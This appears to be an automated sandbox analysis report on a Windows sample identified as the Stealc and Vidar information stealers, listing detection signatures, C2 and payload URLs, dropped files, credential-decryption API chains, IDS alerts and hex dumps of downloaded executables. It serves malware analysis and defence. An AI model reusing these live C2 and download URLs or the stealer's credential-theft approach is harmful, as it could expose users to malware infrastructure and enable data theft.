Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1501904
MD5: a2d6bc4c76921e184d0a81e79c40ede1
SHA1: befa619180442f1a3b968f232d68a18d6ad58251
SHA256: 9c4dca830487bda060624059ffc910041ce76975a00750092fcfbb0ba99512ce
Tags: exe
Infos:

Detection

Clipboard Hijacker, PureLog Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://193.176.190.41/9e7fbd3f0393ef32/mozglue.dll9U Avira URL Cloud: Label: phishing
Source: http://193.176.190.41/9e7fbd3f0393ef32/nss3.dll: Avira URL Cloud: Label: phishing
Source: http://193.176.190.41/9e7fbd3f0393ef32/mozglue.dll Avira URL Cloud: Label: malware
Source: http://193.176.190.41/2fa883eebd632382.phpb Avira URL Cloud: Label: malware
Source: http://193.176.190.41/9e7fbd3f0393ef32/vcruntime140.dll Avira URL Cloud: Label: phishing
Source: http://193.176.190.41/2fa883eebd632382.phption: Avira URL Cloud: Label: malware
Source: http://193.176.190.41/9e7fbd3f0393ef32/msvcp140.dll Avira URL Cloud: Label: phishing
Source: https://aldiablo.cl/karu/l2.exe Avira URL Cloud: Label: malware
Source: http://193.176.190.41/9e7fbd3f0393ef32/nss3.dll Avira URL Cloud: Label: malware
Source: http://193.176.190.41/9e7fbd3f0393ef32/freebl3.dll Avira URL Cloud: Label: malware
Source: http://193.176.190.41/9e7fbd3f0393ef32/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://193.176.190.41/2fa883eebd632382.php9a9c4a2f8b514.cdf-ms Avira URL Cloud: Label: malware
Source: http://193.176.190.41/9e7fbd3f0393ef32/softokn3.dll Avira URL Cloud: Label: malware
Source: http://193.176.190.41/ Avira URL Cloud: Label: malware
Source: http://193.176.190.41/2fa883eebd632382.php Avira URL Cloud: Label: malware
Source: http://193.176.190.41/2fa883eebd632382.phpTgHw Avira URL Cloud: Label: malware
Source: http://193.176.190.41 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\HJJDGHCBGD.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Found malware configuration
Source: 00000002.00000002.2378894358.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://193.176.190.41/2fa883eebd632382.php"}
Source: 2.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://193.176.190.41/2fa883eebd632382.php", "Botnet": "cry"}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\HJJDGHCBGD.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\l2[1].exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 73%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 2_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 2_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 2_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 2_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 2_2_6C2E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C43A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 2_2_6C43A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C434440 PK11_PrivDecrypt, 2_2_6C434440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C404420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 2_2_6C404420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4344C0 PK11_PubEncrypt, 2_2_6C4344C0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 186.64.114.115:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2401013873.000000006C34D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: AVP.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2401574869.000000006C50F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2401013873.000000006C34D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 2_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 2_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 2_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49733 -> 193.176.190.41:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49733 -> 193.176.190.41:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 193.176.190.41:80 -> 192.168.2.4:49733
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49733 -> 193.176.190.41:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 193.176.190.41:80 -> 192.168.2.4:49733
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49733 -> 193.176.190.41:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49733 -> 193.176.190.41:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://193.176.190.41/2fa883eebd632382.php
Source: Malware configuration extractor URLs: http://193.176.190.41/2fa883eebd632382.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:12:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:13:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 30 Aug 2024 16:13:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 